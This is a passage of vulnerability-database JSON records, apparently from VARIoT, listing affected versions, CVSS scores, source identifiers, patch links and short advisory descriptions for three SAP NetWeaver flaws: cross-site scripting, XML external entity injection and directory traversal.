"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-2365",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201803-035",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002507"
},
{
"db": "NVD",
"id": "CVE-2018-2365"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-035"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Portal, WebDynpro Java, 7.30, 7.31, 7.40, 7.50, does not sufficiently encode user controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. \nRemote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2365"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002507"
},
{
"db": "BID",
"id": "102999"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-2365",
"trust": 2.7
},
{
"db": "BID",
"id": "102999",
"trust": 2.1
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002507",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201803-035",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "102999"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002507"
},
{
"db": "NVD",
"id": "CVE-2018-2365"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-035"
}
]
},
"id": "VAR-201803-1755",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:38:42.242000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "February 2018 (2547977)",
"trust": 0.8,
"url": "https://blogs.sap.com/2018/02/13/sap-security-patch-day-february-2018/"
},
{
"title": "SAP NetWeaver RunTime Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=78830"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002507"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-035"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002507"
},
{
"db": "NVD",
"id": "CVE-2018-2365"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://launchpad.support.sap.com/#/notes/2547977"
},
{
"trust": 1.9,
"url": "https://blogs.sap.com/2018/02/13/sap-security-patch-day-february-2018/"
},
{
"trust": 1.8,
"url": "http://www.securityfocus.com/bid/102999"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-2365"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-2365"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
}
],
"sources": [
{
"db": "BID",
"id": "102999"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002507"
},
{
"db": "NVD",
"id": "CVE-2018-2365"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-035"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "102999"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002507"
},
{
"db": "NVD",
"id": "CVE-2018-2365"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-035"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-02-13T00:00:00",
"db": "BID",
"id": "102999"
},
{
"date": "2018-04-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-002507"
},
{
"date": "2018-03-01T17:29:00.227000",
"db": "NVD",
"id": "CVE-2018-2365"
},
{
"date": "2018-03-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-035"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-02-13T00:00:00",
"db": "BID",
"id": "102999"
},
{
"date": "2018-04-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-002507"
},
{
"date": "2018-03-23T16:45:12.727000",
"db": "NVD",
"id": "CVE-2018-2365"
},
{
"date": "2018-03-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-035"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-035"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver Portal WebDynpro Java Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002507"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-035"
}
],
"trust": 0.6
}
}
var-201809-0967
Vulnerability from variot
In certain cases, BEx Web Java Runtime Export Web Service in SAP NetWeaver BI 7.30, 7.31. 7.40, 7.41, 7.50, does not sufficiently validate an XML document accepted from an untrusted source. SAP NetWeaver BI Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. SAP NetWeaver Business Intelligence is prone to an XML External Entity injection vulnerability. Attackers can exploit this issue to gain access to sensitive information or cause denial-of-service conditions. NetWeaver Business Intelligence 7.30, 7.31. 7.40, 7.41, and 7.50 are vulnerable
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201809-0967",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 2.4,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.4,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.4,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.4,
"vendor": "sap",
"version": "7.41"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.4,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.41"
},
{
"model": "netweaver business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
}
],
"sources": [
{
"db": "BID",
"id": "105326"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010854"
},
{
"db": "NVD",
"id": "CVE-2018-2462"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-555"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:business_intelligence:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.41:*:*:*:business_intelligence:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:business_intelligence:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:business_intelligence:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:business_intelligence:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2462"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "105326"
}
],
"trust": 0.3
},
"cve": "CVE-2018-2462",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-2462",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-2462",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-2462",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201809-555",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010854"
},
{
"db": "NVD",
"id": "CVE-2018-2462"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-555"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "In certain cases, BEx Web Java Runtime Export Web Service in SAP NetWeaver BI 7.30, 7.31. 7.40, 7.41, 7.50, does not sufficiently validate an XML document accepted from an untrusted source. SAP NetWeaver BI Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. SAP NetWeaver Business Intelligence is prone to an XML External Entity injection vulnerability. \nAttackers can exploit this issue to gain access to sensitive information or cause denial-of-service conditions. \nNetWeaver Business Intelligence 7.30, 7.31. 7.40, 7.41, and 7.50 are vulnerable",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2462"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010854"
},
{
"db": "BID",
"id": "105326"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-2462",
"trust": 2.7
},
{
"db": "BID",
"id": "105326",
"trust": 1.3
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010854",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201809-555",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "105326"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010854"
},
{
"db": "NVD",
"id": "CVE-2018-2462"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-555"
}
]
},
"id": "VAR-201809-0967",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:18:58.761000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Patch Day - September 2018",
"trust": 0.8,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=499356993"
},
{
"title": "SAP NetWeaver BI Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=84825"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010854"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-555"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010854"
},
{
"db": "NVD",
"id": "CVE-2018-2462"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://launchpad.support.sap.com/#/notes/2644279"
},
{
"trust": 1.9,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=499356993"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/bid/105326"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-2462"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-2462"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
}
],
"sources": [
{
"db": "BID",
"id": "105326"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010854"
},
{
"db": "NVD",
"id": "CVE-2018-2462"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-555"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "105326"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010854"
},
{
"db": "NVD",
"id": "CVE-2018-2462"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-555"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-11T00:00:00",
"db": "BID",
"id": "105326"
},
{
"date": "2018-12-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010854"
},
{
"date": "2018-09-11T15:29:01.750000",
"db": "NVD",
"id": "CVE-2018-2462"
},
{
"date": "2018-09-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-555"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-11T00:00:00",
"db": "BID",
"id": "105326"
},
{
"date": "2018-12-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010854"
},
{
"date": "2018-11-26T20:14:51.373000",
"db": "NVD",
"id": "CVE-2018-2462"
},
{
"date": "2018-09-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-555"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-555"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver BI Input validation vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010854"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-555"
}
],
"trust": 0.6
}
}
var-201311-0367
Vulnerability from variot
Directory traversal vulnerability in the Exportability Check Service in SAP NetWeaver allows remote attackers to read arbitrary files via unspecified vectors. SAP NetWeaver is the technical foundation of SAP's integrated technology platform and all SAP applications since SAP Business Suite. SAP NetWeaver is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application. This may aid in further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201311-0367",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.x"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver ehp2",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver ehp1",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "netweaver",
"version": null
}
],
"sources": [
{
"db": "IVD",
"id": "8933ff62-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01227"
},
{
"db": "BID",
"id": "58090"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005200"
},
{
"db": "NVD",
"id": "CVE-2013-6821"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-292"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6821"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry Chastukhin of ERPScan",
"sources": [
{
"db": "BID",
"id": "58090"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-486"
}
],
"trust": 0.9
},
"cve": "CVE-2013-6821",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2013-6821",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "8933ff62-1f34-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-6821",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201311-292",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "8933ff62-1f34-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "8933ff62-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005200"
},
{
"db": "NVD",
"id": "CVE-2013-6821"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-292"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
